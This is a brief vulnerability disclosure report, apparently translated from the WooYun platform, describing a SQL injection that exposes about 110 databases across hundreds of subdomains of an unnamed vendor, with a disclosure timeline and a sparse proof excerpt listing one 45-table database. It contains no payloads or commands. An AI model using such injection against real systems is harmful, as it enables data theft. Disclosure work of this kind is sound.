Vulnerability summary
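Vulnerability details
Disclosure status:
	2014-03-13:	Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
	2014-04-27:	The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:
All databases can be obtained! The amount of data involved should be very large! Several hundred second-level domains.
Detailed description:
Proof of vulnerability: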
available databases [110]:
I picked a database at random and tested it:
Database: job
[45 tables]
Remediation:
Prevent injection!
Copyright notice: please credit the source when reposting → Hack涛@乌云
Vulnerability response
Vendor response:
Unable to reach the vendor, or the vendor actively refused

 
                 
                        